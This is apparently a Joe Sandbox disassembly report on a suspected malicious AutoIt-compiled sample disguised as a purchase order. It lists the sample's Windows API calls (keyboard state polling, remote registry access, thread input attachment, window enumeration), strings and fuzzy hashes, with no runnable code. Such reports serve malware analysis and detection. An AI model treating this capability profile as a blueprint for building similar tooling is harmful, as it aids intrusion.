                                  • API String ID: 1962976255-3081909835
                                  APIs
                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                  • _wcslen.LIBCMT ref: 004610A3
                                  • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                  • GetWindowRect.USER32(?,?), ref: 00461248
                                    • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                  Strings
                                  Similarity
                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                  • String ID: ThumbnailClass
                                  • API String ID: 4136854206-1241985126
                                  APIs
                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                  • 6FDA2980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                  • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                  • 6FD9C400.COMCTL32(?,000000FF,?), ref: 00471960
                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                  • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                  • GetClientRect.USER32(?,?), ref: 00471A1A
                                  • 74285EE0.USER32(?,?,00000000,00000000), ref: 00471A29
                                  • DestroyCursor.USER32(?), ref: 00471AF4
                                  Strings
                                  Similarity
                                  • API ID: MessageSend$74285A2980C400ClientCursorDestroyExtractIconRect
                                  • String ID: 2
                                  • API String ID: 3666795388-450215437
                                  • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                  • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                  • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                  • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                  • __swprintf.LIBCMT ref: 00460915
                                  • __swprintf.LIBCMT ref: 0046092D
                                  • _wprintf.LIBCMT ref: 004609E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                  • API String ID: 3054410614-2561132961
                                  • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                  • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                  • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                  • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                  APIs
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                  • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                  • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                  • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                  • API String ID: 600699880-22481851
                                  • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                  • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                  • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                  • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285
                                  • String ID: static
                                  • API String ID: 3433674075-2160076837
                                  • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                  • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                  • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                  • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                  • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$DriveType
                                  • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                  • API String ID: 2907320926-3566645568
                                  • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                  • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                  • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                  • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                  APIs
                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                  • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                  • 6FDA0860.COMCTL32(?), ref: 004709AD
                                  • 6FDA0860.COMCTL32(?), ref: 004709C5
                                  • 6FDA0860.COMCTL32(?), ref: 004709D5
                                  • DeleteObject.GDI32(003D0000), ref: 00470A04
                                  • DestroyCursor.USER32(003A0043), ref: 00470A1C
                                  • DeleteObject.GDI32(00660000), ref: 00470A34
                                  • 74285CF0.USER32(00650064), ref: 00470A4C
                                  • DestroyCursor.USER32(?), ref: 00470A73
                                  • DestroyCursor.USER32(?), ref: 00470A81
                                  • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Destroy$A0860Cursor$DeleteObject$74285AcceleratorInvalidateKillRectTableTimer
                                  • String ID:
                                  • API String ID: 3592287921-0
                                  • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                  • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                  • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                  • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                  APIs
                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                  • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                  • VariantInit.OLEAUT32(?), ref: 004793E1
                                  • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                  • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                  • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                  • VariantClear.OLEAUT32(?), ref: 00479489
                                  • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                  • VariantClear.OLEAUT32(?), ref: 004794CA
                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                  • String ID:
                                  • API String ID: 2706829360-0
                                  • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                  • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                  • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                  • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044480E
                                  • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                  • GetKeyState.USER32(000000A0), ref: 004448AA
                                  • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                  • GetKeyState.USER32(000000A1), ref: 004448D9
                                  • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                  • GetKeyState.USER32(00000011), ref: 00444903
                                  • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                  • GetKeyState.USER32(00000012), ref: 0044492D
                                  • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                  • GetKeyState.USER32(0000005B), ref: 00444958
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: State$Async$Keyboard
                                  • String ID:
                                  • API String ID: 541375521-0
                                  • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                  • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                  • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                  • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: InitVariant$_malloc_wcscpy_wcslen
                                  • String ID:
                                  • API String ID: 3413494760-0
                                  • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                  • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                  • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                  • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressProc_free_malloc$_strcat_strlen
                                  • String ID: AU3_FreeVar
                                  • API String ID: 2634073740-771828931
                                  • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                  • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                  • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                  • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                  APIs
                                  • CoInitialize.OLE32 ref: 0046C63A
                                  • CoUninitialize.OLE32 ref: 0046C645
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                    • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                  • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                  • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                  • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                  • IIDFromString.OLE32(?,?), ref: 0046C705
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                  • API String ID: 2294789929-1287834457
                                  • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                  • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                  • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                  • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                  APIs
                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                  • _wcslen.LIBCMT ref: 00450720
                                  • _wcscat.LIBCMT ref: 00450733
                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                  • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window_wcscat_wcslen
                                  • String ID: -----$SysListView32
                                  • API String ID: 4008455318-3975388722
                                  • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                  • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                  • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                  • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                  • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                  • GetParent.USER32 ref: 00469C98
                                  • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                  • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                  • GetParent.USER32 ref: 00469CBC
                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                  Similarity
                                  • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                  • String ID: ComboBox$ListBox
                                  • API String ID: 2360848162-1403004172
                                  • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                  • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                  • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                  • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                  Similarity
                                  • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                  • String ID:
                                  • API String ID: 262282135-0
                                  • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                  • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                  • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                  • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                  APIs
                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                  • 742845F0.USER32(?,000000F0,?,0000101F,00000000,00000000,00001200,00000000,00000000), ref: 004481CF
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                  • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                  • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                  • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                  • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                  Similarity
                                  • API ID: MessageSend$742845
                                  • String ID:
                                  • API String ID: 1730662999-0
                                  • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                  • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                  • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                  • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00434643
                                  • GetForegroundWindow.USER32(00000000), ref: 00434655
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                  Similarity
                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                  • String ID:
                                  • API String ID: 2156557900-0
                                  • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                  • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                  • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                  • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
